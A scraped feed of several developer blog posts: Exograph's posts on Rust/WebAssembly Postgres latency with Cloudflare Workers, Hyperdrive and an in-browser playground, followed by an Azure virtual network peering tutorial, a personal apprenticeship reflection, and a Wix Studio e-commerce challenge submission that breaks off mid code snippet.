canonical_url: https://exograph.dev/blog/wasm-pg-explorations-2
---

In the [previous post](https://exograph.dev/blog/wasm-pg-explorations-1), we implemented a simple Cloudflare Worker in Rust/WebAssembly connecting to a [Neon](https://neon.tech/) Postgres database and measured end-to-end latency. Without any pooling, we got a mean response time of 345ms. The two issues we suspected for the high latency were:

> **Establishing connection to the database**: The worker creates a new connection for each request. Given that it is a secure connection, it takes 7+ round trips. Not surprisingly, latency is high.
>
> **Executing the query**: The query method in our code causes the Rust Postgres driver to make two round trips: to prepare the statement and to bind/execute the query. It also sends a one-way message to close the prepared statement.

In this part, we will deal with connection establishment time by introducing a pool. We will fork the driver to deal with multiple round trips (which incidentally also helps with connection pooling). We will also learn a few things about Postgres's query protocol.

> Source code
> The source code with all the examples explored in this post is available on [GitHub](https://github.com/exograph/wasm-pg-cloudflare-explorations). With it, you can perform measurements and experiments on your own.

## Introducing connection pooling

If the problem is establishing a connection, the solution could be a pool. This way, we can reuse the existing connections instead of creating a new one for each request.

### Application-level pooling

Could we use a pooling crate such as [deadpool](https://github.com/bikeshedder/deadpool)? While that would be a good option in a typical Rust environment (and Exograph uses it), it is not an option in the Cloudflare Worker environment. A worker is considered stateless and should not maintain any state between requests. Since a pool is a stateful object (holding the connections), it can't be used in a worker. If you try to use it, you will get the following runtime error on every other request:

```
Error: Cannot perform I/O on behalf of a different request. I/O objects (such as streams, request/response bodies, and others) created in the context of one request handler cannot be accessed from a different request's handler. This is a limitation of Cloudflare Workers which allows us to improve overall performance.
When the client makes the first request, the worker creates a pool and successfully executes the query. For the second request, the worker tries to reuse the pool, but it fails due to the error above, leading to the eviction of the worker by the Cloudflare runtime. For the third request, a fresh worker creates another pool, and the cycle continues.

The error is clear: we cannot use application-level pooling in this environment.

### External pooling

Since application-level pooling won't work in this environment, could we try an external pool? Cloudflare provides [Hyperdrive](https://developers.cloudflare.com/hyperdrive) for connection pooling (and more, such as query caching). Let's try that.

```rust
#[event(fetch)]
async fn main(_req: Request, env: Env, _ctx: Context) -> Result<Response> {
    let hyperdrive = env.hyperdrive("todo-db-hyperdrive")?;

    let config = hyperdrive
        .connection_string()
        .parse::<tokio_postgres::Config>()
        .map_err(|e| worker::Error::RustError(format!("Failed to parse configuration: {:?}", e)))?;

    let host = hyperdrive.host();
    let port = hyperdrive.port();

    // Same as before
}
```

Besides how we get the host and port, the rest of the code (to connect to the database and execute the query) remains the same as in [part 1](https://exograph.dev/blog/wasm-pg-explorations-1).

You will need to create a Hyperdrive instance using the following command (replace the connection string with your own):

```sh
npx wrangler hyperdrive create todo-db-hyperdrive --caching-disabled --connection-string "postgres://..."
```

We disable [query caching](https://developers.cloudflare.com/hyperdrive/configuration/query-caching/) since, if enabled, it would cause most database calls to be skipped: due to the empty cache, the first request would hit the database, but for subsequent requests (which execute the same SQL query in our setup), Hyperdrive would likely serve the results from its cache. We are interested in measuring latency that includes database calls; with caching turned on, the comparison to the baseline would be apples-to-oranges.
> For the real-world scenario, you may enable caching to balance database load and freshness of data.

Next, you will need to put the Hyperdrive information in `wrangler.toml`:

```toml
[[hyperdrive]]
binding = "todo-db-hyperdrive"
id = "<your-hyperdrive-id>"
```

Let's test this worker.

```sh
curl <worker-url>

INTERNAL SERVER ERROR
```

Hmm... that failed.

> **Fast moving ground**
> This is due to an issue with the current Hyperdrive implementation. The support for prepared statements is still new and (currently) works only with caching enabled. I have made the Cloudflare team aware of it. I think this will be fixed soon 🤞. As things change, I will add updates here.

What's going on? Postgres has two kinds of query protocols:

1. [Simple query protocol](https://www.postgresql.org/docs/current/protocol-flow.html#PROTOCOL-FLOW-SIMPLE-QUERY): With this protocol, you must supply the SQL as a string and include any parameter values in the query (for example, `SELECT * FROM todos WHERE id = 1`). The driver makes one round trip to execute such a query.
2. [Extended query protocol](https://www.postgresql.org/docs/current/protocol-flow.html#PROTOCOL-FLOW-EXT-QUERY): With this protocol, you may have the SQL query with placeholders for parameters (for example, `SELECT * FROM todos WHERE id = $1`), and its execution requires a preparation step. We will go into detail in the [next section](https://exograph.dev/blog/wasm-pg-explorations-2#hyperdrive-with-the-extended-query-protocol).

Let's explore both protocols.
## Hyperdrive with the simple query protocol

To explore the simple query protocol, we will use the [`simple_query`](https://docs.rs/tokio-postgres/latest/tokio_postgres/struct.Client.html#method.simple_query) method. Since it doesn't allow specifying parameters, we inline them.

```rust
#[event(fetch)]
async fn main(_req: Request, env: Env, _ctx: Context) -> Result<Response> {
    // Hyperdrive setup as before

    let rows = client
        .simple_query("SELECT id, title, completed FROM todos WHERE completed = true")
        .await
        .map_err(|e| worker::Error::RustError(format!("Failed to query: {:?}", e)))?;

    ...
}
```

Does it work, and how does it perform?

```sh
$ oha -c 1 -n 100 <worker-url>

Slowest: 0.2871 secs
Fastest: 0.0476 secs
Average: 0.0633 secs
```

That's more like it! The mean response time is **63ms**, a significant improvement over the previous 345ms. Since the simple query protocol needs only one round trip, Hyperdrive was able to use an existing connection without too much additional logic, so it worked without any issues and performed well.

But... the simple query protocol forces us to use string interpolation to inline the parameters in the query, which is a big no-no in the world of databases due to the risk of SQL injection attacks. So let's not do that!

## Hyperdrive with the extended query protocol

Let's go back to the extended query protocol and figure out why Hyperdrive might be struggling with it. As it happens, all external pooling services deal with the same issue; for example, only recently did [pgBouncer](https://www.pgbouncer.org/2023/10/pgbouncer-1-21-0) start to support it.

When using the extended query protocol through [`query`](https://docs.rs/tokio-postgres/latest/tokio_postgres/struct.Client.html#method.query), the driver executes the following steps:

1. **Prepare**: Sends a prepare request. This contains a name for the statement (for example, "s1") and a query with placeholders for parameters to be provided later (for example, `$1`, `$2`, etc.). The server sends back the expected parameter types.
2. **Bind/execute**: Sends the name of the prepared statement and the parameters serialized in the format appropriate for the types. The server looks up the prepared statement by name and executes it with the provided parameters. It sends back the rows.
3. **Close**: Closes the prepared statement to free up the resources on the server.
In `tokio-postgres`, this is a fire-and-forget operation (it doesn't wait for a response).

![](https://exograph.dev/assets/images/extended-quey-light-609b32186fae816db2d153a8a7a66f17.png#gh-light-mode-only)

When you add in a connection pool, the driver must invoke the "bind/execute" and "close" steps with the same connection it used for "prepare". This requires some bookkeeping and is a source of complexity.

What if we combine all three steps into a single network package? This is what Exograph's fork of `tokio-postgres` ([fork](https://github.com/exograph/rust-postgres/tree/exograph), [PR](https://github.com/sfackler/rust-postgres/pull/1147)) does. The client must specify the parameter values _and their types_ (we no longer perform a round trip to discover parameter types). This way, the driver can serialize the parameters in the correct format in the same network package.

```rust
#[event(fetch)]
async fn main(_req: Request, env: Env, _ctx: Context) -> Result<Response> {
    // Hyperdrive setup as before

    let rows: Vec<tokio_postgres::Row> = client
        .query_with_param_types(
            "SELECT id, title, completed FROM todos where completed <> $1",
            &[(&true, Type::BOOL)],
        )
        .await
        .map_err(|e| worker::Error::RustError(format!("query_with_param_types: {:?}", e)))?;

    ...
}
```

How does this perform?

```sh
$ oha -c 1 -n 100 <worker-url>

Slowest: 0.2883 secs
Fastest: 0.0466 secs
Average: 0.0620 secs
```

Nice! The mean response time is now 62ms, which matches the simple query protocol (63ms).

## Summary

Let's summarize the mean response times (in milliseconds) for the various configurations:

| Pooling ⬇️ / Method ➡️ | `query` | `simple_query` | `query_with_param_types` |
| --- | --- | --- | --- |
| None | 345 | 312 | **312** |
| Hyperdrive | [see above](https://exograph.dev/blog/wasm-pg-explorations-2#external-pooling) | 63 | **62** |

With connection pooling through Hyperdrive, we have brought the mean response time down by a factor of 5.5 (from 345ms to 62ms)!
> **Round trip cost**
> The 33ms improvement between `query` (345ms) and `query_with_param_types` (312ms) is likely due to saving the extra round trip for the "prepare" step, but this needs further investigation.

The source code is available on [GitHub](https://github.com/exograph/wasm-pg-cloudflare-explorations), so you can check this yourself. If you find any improvements or issues, please let me know.

So what should you use? Assuming that the issue with Hyperdrive and the `query` method has been fixed:

- If you don't want to use Hyperdrive, use the `query_with_param_types` method with the forked driver. It does the job in one round trip and gives you the best performance without any risk of SQL injection attacks.
- If you want to use Hyperdrive:
  - If you frequently make the same queries, the `query` method will likely do better. Hyperdrive may cache the "prepare" part of the step, making subsequent queries faster.
  - If you make a variety of queries, use the `query_with_param_types` method. Since you won't execute the same query frequently, Hyperdrive's prepared statement caching is unlikely to help. Instead, this method's fewer round trips will be beneficial.

Watch Exograph's [blog](https://exograph.com/blog) for more explorations and insights as we ship its Cloudflare Worker support. You can reach us on [Twitter](https://twitter.com/exographdev) or [Discord](https://discord.gg/EPdqyvCpNw). We would appreciate a [star on GitHub](https://github.com/exograph/exograph)!
ramnivas
1,920,169
Exograph at the Edge with Cloudflare Workers
We are excited to announce that Exograph can now run as a Cloudflare Worker! This new capability...
0
2024-07-11T20:40:45
https://exograph.dev/blog/cloudflare-workers
webassembly, cloudflare, workers, edge
---
title: Exograph at the Edge with Cloudflare Workers
published: true
date: 2024-06-12 00:00:00 UTC
tags: WebAssembly, Cloudflare, Workers, Edge
canonical_url: https://exograph.dev/blog/cloudflare-workers
---

We are excited to announce that Exograph can now run as a [Cloudflare Worker](https://workers.cloudflare.com/)! This new capability allows deploying Exograph servers at the edge, closer to your users, and with lower latency.

Cloudflare Workers is a good choice for deploying APIs due to the following characteristics:

- They scale automatically to handle changing traffic patterns, including scaling down to zero.
- They have an excellent cold start time (in milliseconds).
- They get deployed in Cloudflare's global network, so the workers can be placed optimally for better latency and performance.
- They have generous free tier limits that can be sufficient for many applications.

With Cloudflare as a deployment option, a question remains: how do we develop backends? Typical backend development can be complex, time-consuming, and expensive, requiring specialized teams to ensure secure and efficient execution. This is where Exograph shines. With Exograph, developers:

- Focus only on defining the domain model and authorization rules.
- Get inferred APIs (currently GraphQL, with REST and RPC coming soon) that execute securely and efficiently.
- Use the provided tools to develop locally, deploy to the cloud, migrate database schemas, etc.
- Use telemetry to monitor production usage.

Combine Cloudflare Workers with Exograph, and you get cost-effective development and deployment. In this blog, we will show you how to deploy Exograph backends on Cloudflare Workers and how to use Hyperdrive to reduce latency.

## A taste of Exograph on Cloudflare Workers

Exograph provides a CLI command to create a WebAssembly distribution suitable for Cloudflare. It also creates starter configuration files to develop locally and deploy to the cloud.

![exo deploy cf-worker](https://exograph.dev/assets/images/exo-deploy-cf-worker-68b8c8b6e9e79536689d8ea9b5b7027e.png)

The command will provide instructions for setting up the database connection. You can create a new database or use an existing one and add its URL as the `EXO_POSTGRES_URL` secret. Cloudflare Workers also integrate with databases such as [Neon](https://neon.tech/) to add this secret through Cloudflare's dashboard.

To run the worker locally, you can use the following command:

```
npx wrangler dev
...
Using vars defined in .dev.vars
Your worker has access to the following bindings:
- Vars:
  - EXO_POSTGRES_URL: "(hidden)"
  - EXO_JWT_SECRET: "(hidden)"
⎔ Starting local server...
[wrangler:inf] Ready on http://localhost:8787
```

And when you are ready to deploy to the cloud, run:

```
npx wrangler deploy
...
Uploaded todo (2.19 sec)
Published todo (0.20 sec)
  https://todo.<domain>.workers.dev
...
```
Please see the [Exograph documentation](https://exograph.dev/docs/deployment/cloudflare-workers) for more details.

## Using Hyperdrive to reduce latency

Let's measure the latency of a request with a query to fetch all todos. Here, we have deployed the worker that connects to a Postgres database managed by Neon.

```
oha -c 1 -n 10 -m POST -d '{ "query": "{todos { id }}"}' <worker-url>

Slowest: 0.5357 secs
Fastest: 0.2436 secs
Average: 0.2872 secs
```

The mean response time of 287ms is good but not stellar. The main reason for the increased latency is that the worker has to open a new connection to the Postgres database for every request.

If connection establishment time is the problem, connection pooling is a solution. For Cloudflare Workers, connection pooling comes in the form of [Hyperdrive](https://developers.cloudflare.com/hyperdrive/).

{% details **Behind the scenes** %}
To extract latency benefits, we dealt with a few challenges. You can read more about them in our previous blog posts on "Latency at the Edge with Rust/WebAssembly and Postgres": [Part 1](https://exograph.dev/blog/wasm-pg-explorations-1) and [Part 2](https://exograph.dev/blog/wasm-pg-explorations-2).
{% enddetails %}

To use this connection pooling option, you create a Hyperdrive using either the `npx wrangler hyperdrive create` command or the Cloudflare Workers dashboard. Then add the following to your `wrangler.toml`:

```
EXO_HYPERDRIVE_BINDING = "<binding-name>"

[[hyperdrive]]
binding = "<binding-name>"
id = "..."
```
The worker will now use Hyperdrive to manage the database connections, significantly reducing the latency of the requests. Let's measure the latency again:

```
oha -c 1 -n 10 -m POST -d '{ "query": "{todos { id }}"}' <worker-url>

Slowest: 0.3588 secs
Fastest: 0.0879 secs
Average: 0.0967 secs
```

Much better! We have reduced the mean response time to 97ms, significantly faster than the previous 287ms.

## How does it work?

A Cloudflare Worker is, at its core, a [V8](https://v8.dev/) runtime capable of running JavaScript code. V8 also supports loading and executing WebAssembly modules from JavaScript. To make Exograph run on Cloudflare Workers, we compiled Exograph to WebAssembly. Currently, Rust has the best tooling to target WebAssembly. Here, our decision to implement Exograph in Rust paid off!

![How it works](https://exograph.dev/assets/images/how-it-works-b50a9de02dd6ac65a852e2208094c486.png)

As for the developers using Exograph, we ship a WebAssembly binary distribution for `exo-server`, which provides bindings to the Cloudflare Workers runtime and implements a few optimizations. It also creates JavaScript scaffolding to interact with the WebAssembly binary.

## Roadmap

Our current Cloudflare Worker support is a preview. We are planning on adding more features and improvements in the upcoming releases. Here is a high-level roadmap:

- **Improved performance**: While the performance in the current release is already pretty good, especially with Hyperdrive, Exograph's ahead-of-time compilation offers more opportunities to improve it, and we will explore them.
- **JS integration**: Exograph embeds [Deno](https://deno.land/) as the JavaScript engine, but that won't work in Cloudflare Workers. However, the Cloudflare Worker's primary runtime is JavaScript (WebAssembly is a guest), so we will support integrating Exograph with the host system's JavaScript runtime.
- **Trusted documents**: The current release doesn't yet support [trusted documents](https://exograph.dev/docs/production/trusted-documents), but we are working on it.

## What's Next?

Exograph's WebAssembly target is a significant milestone in our journey to bring new possibilities to the Exograph ecosystem. But this is just the beginning. The next blog post will showcase another exciting feature due to this new capability. Stay tuned!
We are eager to know how you plan to use Exograph in Cloudflare Workers. You can reach us on [Twitter](https://twitter.com/exographdev) or [Discord](https://discord.gg/EPdqyvCpNw) with your feedback. We would appreciate a [star on GitHub](https://github.com/exograph/exograph)!
ramnivas
1,920,170
GraphQL Server in the Browser using WebAssembly
On the heels of our last feature release, we are excited to announce a new feature: Exograph...
0
2024-07-11T20:28:47
https://exograph.dev/blog/playground
webassembly, graphql, playground, rust
---
title: GraphQL Server in the Browser using WebAssembly
published: true
date: 2024-06-18 00:00:00 UTC
tags: WebAssembly, GraphQL, Playground, Rust
canonical_url: https://exograph.dev/blog/playground
---

On the heels of our [last feature release](https://exograph.dev/blog/cloudflare-workers), we are excited to announce a new feature: Exograph Playground in the browser! Thanks to the magic of WebAssembly, you can now run Exograph servers entirely in your browser, so you can try Exograph without even installing it. That's right, we run a [Tree Sitter](https://tree-sitter.github.io/tree-sitter) parser, typechecker, GraphQL runtime, _and_ Postgres **all in your browser**.

## See it in action

Head over to the [Exograph Playground](https://exograph.dev/playground) to try it out. It shows a few pre-made models and populates data for you to explore. It also shows sample queries to help you get started.

A few models need authentication, so you can click on the "Key" icon in the middle center of the GraphiQL component to simulate the login action.

When you open the playground, the top-left portion shows the model. The top-right portion shows tabs to give insight into Exograph's inner workings. The bottom portion shows the GraphiQL interface to run queries and mutations.

[![Exograph Playground screenshot](https://exograph.dev/assets/images/screenshot-492818f0ce1f649e4bdc1aa0a402f823.png)](https://exograph.dev/playground)

You can also create your own model by replacing the existing model in the playground. The playground supports sharing your playground project as a gist.

## How it works

The Exograph Playground runs entirely in the browser. Besides the initial loading of static assets (like the WebAssembly binary and JavaScript code), you don't need to be connected to the internet. This is possible because we compiled Exograph, written in Rust, to WebAssembly.

![Playground Architecture](https://exograph.dev/assets/images/how-it-works-9967b1881fb7d1b8d16f371f22efdead.png)

### Builder

The builder plays a role equivalent to the [`exo build`](https://exograph.dev/docs/cli-reference/development/build) command. It reads the source code, parses and typechecks it, and produces an intermediate representation (equivalent to the `exo_ir` file). The builder also includes elements equivalent to the [`exo schema`](https://exograph.dev/docs/cli-reference/development/schema) command to compute the SQL schema and migrations.

On every change to the source code, the builder validates the model, reports any errors, and produces an updated intermediate representation. You can see the errors in the "Problems" tab.

The builder also produces the initial SQL schema and migrations for the model as you change it. The playground will automatically apply migrations as needed. You can see the schema in the "Schema" tab.

### Runtime

The runtime is equivalent to the [`exo-server`](https://exograph.dev/docs/cli-reference/production) command. It processes the intermediate representation the builder produced and serves the GraphQL API.
When you run a query, GraphiQL sends it to the runtime, which computes the SQL query, runs it against the database, and returns the results.

The runtime also sends logs to the playground, which you can see in the "Traces" tab. This aids in understanding what Exograph is doing under the hood, including the SQL queries it executes.

### Postgres

The playground uses [pglite](https://github.com/electric-sql/pglite), which is Postgres compiled to WebAssembly. Currently, we store Postgres data in memory, so you will lose the data when you refresh the page. We plan to add support for saving the data to local storage.

### GraphiQL

GraphiQL is a standard GraphQL query interface. You can run queries and mutations against the Exograph server. The playground populates the initial query for you to get started.

## Sharing Playground Project as a Gist

The playground supports sharing its content as a gist. You can load such a gist using the `gist` query parameter. For example, to load the gist with ID `abcd`, you can use the URL `https://exograph.dev/playground?gist=abcd`.

You can create a gist to share your model, the seed data, and the initial query populated in GraphiQL. The files in the gist follow the same layout as the project directory in Exograph, except you use `::` as the directory separator.

- `src::index.exo`: The model
- `tests::init.gql`: The seed data. See [Initializing seed data](https://exograph.dev/docs/production/testing#initializing-seed-data) for more details.
- `playground::query.graphql`: The initial query in GraphiQL
- `README.md`: The README to show in the playground

We will keep improving the sharing experience in the future.

## What's next

This is just the beginning of making Exograph easier to explore. Here are a few planned features to make the playground even better (your feedback is welcome!):

- **Support JavaScript Modules**: In non-browser environments, Exograph supports [Deno Modules](https://exograph.dev/docs/deno). Deno cannot be compiled to WebAssembly, so we cannot run it in the browser. However, browsers already have a JavaScript runtime 🙂, which we will support in the playground.
- **Persistent Data**: We plan to add support for saving the data to local storage so you can continue working on your data model across sessions.
- **Improved Sharing**: We will add a simple way to create gists for your playground content and share them with others.

Try it out and let us know what you think. If you develop a cool model, publish it as a [gist](https://gist.github.com/) and share it with us on [Twitter](https://twitter.com/exographdev) or [Discord](https://discord.gg/EPdqyvCpNw). We would appreciate a [star on GitHub](https://github.com/exograph/exograph)!
ramnivas
1,920,259
Isolate and Connect Your Applications with Azure Virtual Networks and Subnets (Part 1)
Introduction: Imagine you have a critical application that requires isolation from the public...
0
2024-07-17T21:56:58
https://dev.to/jimiog/isolate-and-connect-your-applications-with-azure-virtual-networks-and-subnets-part-1-3k70
azure, cloud, network, security
**Introduction:**

Imagine you have a critical application that requires isolation from the public internet and secure communication with other internal resources. Azure virtual networks and subnets provide the perfect solution to achieve this. We'll guide you through creating virtual networks with subnets and peering them, enabling private and secure communication between your applications.

**Creating the Virtual Networks:**

1. **Search and Create:** Start by searching for "Virtual Networks" in the Azure portal search bar. Click "Create" to initiate the virtual network creation process.
![Clicking Create on Virtual Networks](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a5bexwy1wu6opxprbp4w.jpg)
2. **Resource Group and Naming:** Create a resource group in the East US region to organize your resources. Provide a descriptive name for your virtual network, such as "app-vnet". (The image uses Canada Central, but select East US.)
![Configure the details for the network](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6kof0vvs14qy5lrnox7m.jpg)
3. **Address Space:** Under the "IP Addresses" tab, define the IPv4 address space for your virtual network. A common private address range is 10.1.0.0/16, which provides a good amount of usable IP addresses.
![Changing the default subnet](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kmv9vn8x51xhizul52zq.jpg)
4. **Subnet Configuration:** Click the "Edit" icon for the default subnet. Assign a meaningful name like "frontendSubnet" and configure the address range. Use a subnet mask of /24 (255.255.255.0) to create a subnet with 254 usable IP addresses. For example, you can use the starting IP address 10.1.0.0 for the frontend subnet. This allocates IP addresses from 10.1.0.0 to 10.1.0.255 for your frontend resources.
![Editing the subnet](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iys0cdoljk55bn807scv.jpg)
5. **Creating the Backend Subnet:** Click "Add a subnet" and configure another subnet named "backendSubnet". Assign a non-overlapping address range within the virtual network's space. For instance, you can use 10.1.1.0/24.
![Both subnets](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vq4pdiew9znz35zc8nyh.jpg)
6. **Review and Create:** Once you've defined both subnets, click "Review + create" to validate and deploy the virtual network.

**Creating the Second Virtual Network:**

Follow steps 1-6 above to create a second virtual network for additional resources or functionalities. Here's an example configuration:

* Resource Group: Use the same resource group
* Name: Descriptive name, such as "hub-vnet" (for a hub virtual network)
* Address Space: Choose a non-overlapping address space from the available private ranges. For example, you can use 10.0.0.0/16.
* Subnet Configuration: Define subnets specific to the resources you plan to deploy in this virtual network.

![Creating the second virtual network](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ilttq3zciedvahefpc0g.jpg)
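If you'd rather script this setup than click through the portal, the same result can be sketched with the Azure Python SDK (`azure-mgmt-network`). This is an illustrative sketch only, not part of the portal walkthrough: the resource group name `vnet-rg`, the subscription ID placeholder, and the credential setup are assumptions on my part.

```python
# pip install azure-identity azure-mgmt-network
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient

client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
rg = "vnet-rg"  # assumed resource group, created beforehand in East US

# app-vnet with the frontend and backend subnets from the steps above
client.virtual_networks.begin_create_or_update(
    rg,
    "app-vnet",
    {
        "location": "eastus",
        "address_space": {"address_prefixes": ["10.1.0.0/16"]},
        "subnets": [
            {"name": "frontendSubnet", "address_prefix": "10.1.0.0/24"},
            {"name": "backendSubnet", "address_prefix": "10.1.1.0/24"},
        ],
    },
).result()

# hub-vnet with a non-overlapping address space
client.virtual_networks.begin_create_or_update(
    rg,
    "hub-vnet",
    {"location": "eastus", "address_space": {"address_prefixes": ["10.0.0.0/16"]}},
).result()
```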
**Peering the Virtual Networks:**

1. **Navigate and Select:** Go to the first virtual network you created and navigate to the "Peerings" section. Click on "Add" to initiate the peering configuration.
![Finding Peerings on the first vnet](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8mpmmpo3wo0o67dm1bld.jpg)
2. **Peering Details:** Provide a descriptive name for the peering connection, such as "app-vnet-to-hub-vnet" (assuming the second network is for a hub).
3. **Virtual Network Selection:** Choose the virtual network you want to peer with from the "Virtual network" dropdown menu. In this case, select the second virtual network you just created.
4. **Remote Peering:** Define a name for the remote peering connection from the target virtual network's perspective. For example, "hub-vnet-to-app-vnet".
5. **Verification:** Once configured, click "Save" to establish the peering connection. You can then verify the successful peering status in the Azure portal.

![Configuring the peering connection](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/58yfylxskfebes2gdri4.jpg)
![Confirming the peering connection](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3tdmpfo4jzqf9fbjbsp7.jpg)
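In the same illustrative vein, the two directional peering links can be scripted as well; again, a hedged sketch with `azure-mgmt-network`, reusing the assumed resource group from the earlier sketch:

```python
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient

client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
rg = "vnet-rg"  # same assumed resource group as in the earlier sketch

# Peering is directional, so create one link in each direction
hub = client.virtual_networks.get(rg, "hub-vnet")
app = client.virtual_networks.get(rg, "app-vnet")

client.virtual_network_peerings.begin_create_or_update(
    rg,
    "app-vnet",
    "app-vnet-to-hub-vnet",
    {"remote_virtual_network": {"id": hub.id}, "allow_virtual_network_access": True},
).result()

client.virtual_network_peerings.begin_create_or_update(
    rg,
    "hub-vnet",
    "hub-vnet-to-app-vnet",
    {"remote_virtual_network": {"id": app.id}, "allow_virtual_network_access": True},
).result()
```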
**Conclusion**

By following these steps, you'll have created isolated virtual networks with subnets for your applications. The peered connection allows secure communication between your frontend and backend resources.
jimiog
1,920,267
Package Received
When starting a new job, I tend to enter it cautiously optimistic. I don't consider it a reality...
0
2024-07-12T19:40:13
https://dev.to/neffcodes/package-received-1815
webdev, careerdevelopment
When starting a new job, I tend to enter it cautiously optimistic. I don't consider it a reality until I can touch it, literally. Whenever I start a new job, it doesn't hit me until I first enter the building or get to my workstation. The same thing happened when I joined the Develop Carolina apprenticeship program as a software developer. I couldn't bring myself to celebrate the new opportunity until I had something tangible in hand. In this case, it was a cardboard box.

It's weird how a box can contain so many things. Not only does it provide the equipment needed to do my new job, but it also brings excitement and the realization that "this is happening." It can also contain less inviting things, like imposter syndrome or an excess amount of packaging material.

Those doubts stem from my past experiences. When I first pivoted my career into software development, I was thrown into the deep end. I had only worked on small personal projects up to that point and had never done any large-scale application development. I was lucky to have an amazing team lead, who was patient and understanding, but I was riddled with imposter syndrome. I had the same generic title of Fullstack Developer as the seniors on the team, and I felt that I needed to be at the same skill level as them. In hindsight, that was ridiculous since I was new to the field, but I didn't know any better.

But luckily, that is the beauty of now being an apprentice. I have a new opportunity to define myself, and I know it is expected of me, as Miss Frizzle says, to "take chances, make mistakes, and get messy." And I fully intend to do that. By the end of my apprenticeship, I hope to further develop my technical skills to be more on par with my peers, expand my support network, have more self-confidence, and ultimately have fun. I look forward to being able to work and grow with my fellow apprentices every morning.

It has only been the first week, and I have already learned a lot, both professionally and personally. So look out, world: this cardboard Pandora's box is open, and I can't wait to see what is inside (once I get through all this packaging).
neffcodes
1,920,313
Sharekart
This is a submission for the Wix Studio Challenge . The challenge was to create an innovative...
0
2024-07-12T22:40:17
https://dev.to/salman2301/sharekart-4i48
devchallenge, wixstudiochallenge, webdev, javascript
*This is a submission for the [Wix Studio Challenge](https://dev.to/challenges/wix).*

> The challenge was to create an innovative e-commerce site using Wix Studio and existing Wix APIs.

## What I Built

**TL;DR:** The best type of marketing is word-of-mouth. I built a site where buyers can post their purchases, allowing others to add all the items to their cart and check out with just one click. Basically, it combines e-commerce with social media.

---

Once a user makes a purchase, they can post it in a newsfeed with all the line items. Other users can then add these products to their cart and easily check out. This enhances product visibility.

Users can follow others, and on the product page, they can see a list of users they follow who have also purchased the same product. This reassures users about the product's quality, especially if a big influencer has it, as their followers may also want it.

I've also added a comment section under each post so others can interact directly with the buyer and ask questions.

Below is a list of all the **core systems** developed using the Wix Database, backend code, and Wix Studio.

### System

- **Social media system** - Post / Comment / Follow
  - Once a user makes a purchase, they can post their entire cart and write a comment, which will appear in the newsfeed.
  - A ranking system based on posts, products, inventory, and user activity ranks content higher or lower (please check below for more info).
  - Notifications are sent using the realtime feature to all other users on the Newsfeed page.
  - Users can like / comment / follow on posts.
  - Users can like / follow the commenter.
  - Used Wix Studio's scrollable container to design for optimal UX on both desktop and mobile.
  - Users can add the entire cart from a post instantly and continue to checkout as usual.
- **Rating and review system**
  - Users can rate and review any product.
  - A helpful button allows users to upvote reviews, improving review visibility based on the number of people who find them helpful.
- **Wishlist system**
  - Users can create a custom-labeled Wishlist and add one or many products to it from the product page.
  - Shows the current user's Wishlist on a dynamic page for an easy add-to-cart later.
- **Follow system** - "Followers Also Bought" UI
  - Shows a profile icon on the product page for all followed users who bought that product.
- **Log system**
  - A global logging system that stores logs in the database and clears them every month to aid in debugging.
- **Account page**
  - Extended the built-in account information for users to upload their photo.
## Demo

[https://sharekart.salman2301.com](https://sharekart.salman2301.com)

### Newsfeed section

![Default home page](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9ur8dfm1df3jxtxr0vks.png)

### Newsfeed - Mobile view

![Mobile view](https://media.giphy.com/media/v1.Y2lkPTc5MGI3NjExbW0xazBlN3ZhbjY3MWl2ZzhkYWh5bnJsbW1sMHZ1a2JpM2F1b3hneiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/DU7fhCa9SppTMW8aS8/giphy.gif)

### Rating and review - Product page

![Rating and review](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/syfwm9z09jwcz458io4r.png)

### Wishlist page

![Wishlist button](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i1clx3xjtthdz5h8voiw.png)

![Wishlist section](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4yldl4v7nppqpuniy9dq.png)

### User also bought (People you follow)

![Following user bought](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xjlj2g38e86k3t05gp31.png)

## Development Journey

I used Wix components like Repeater, Table, Grid Layout, Stack, and the Store APIs to build the complex system with just ~1000 lines of Wix Velo code, including JSDoc types.

Modules used: the `date-fns` npm package and a `utils` module file with necessary snippets for the frontend and backend.

To improve performance, I used database indexing, Wix Data aggregates, and Wix Data hooks to manage database interactions efficiently.

### Key Wix Studio Features Used

- Complex grid layouts and scrollable elements for optimal UX on desktop and mobile.
- JSDoc type system for a better development experience.
- Realtime API for notifications on new posts.
- Dynamic pages for efficient content creation based on database entries.
- Database indexing and normalization strategies for improved performance and developer experience.
- Secure data transmission using `.web.js`, database permissions, and realtime permissions based on user roles.
- WixStorev2 API to enhance functionality like the Thank You page and `addToCart`.
- WixMember API for user authentication and extending profile fields.
- Intl library for text formatting based on global localization.
- Custom logger with a cron job for efficient database maintenance.
- CSS width calculation for responsive design.
- WixData Aggregate for calculating average ratings, follower counts, and other data for the ranking system.
- Backend events to monitor inventory changes and update product rankings.
- Bulk saving with Wix (`bulkSave`) to update multiple products' scores at once.
- Global.css to add custom animation CSS for all lightboxes.
- Wix http-functions to get the number of followers, which can be used as a badge ([sample](https://sharekart.salman2301.com/_functions/followers?userId=59dc88d5-c871-4d52-80c1-1e432316b7b4)).

And [lots more](https://github.com/Salman2301/sharekart/blob/main/src/pages/Home.c1dmp.js).

### Ranking Algorithm

Below is the weight-based ranking algorithm used for posts:

```javascript
const WEIGHT = {
  // Section #1
  POST_LIKE: 30,
  POST_COMMENT_COUNT: 20,
  USER_FOLLOWER: 5, // User weight; in the future, adjust based on percentile for proper distribution.

  // Section #2
  POST_ADD_TO_CART: 50,

  // Section #3
  POST_CREATED: 500,

